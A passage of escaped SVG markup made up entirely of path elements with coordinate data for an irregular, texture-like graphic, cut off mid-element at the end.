<path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path 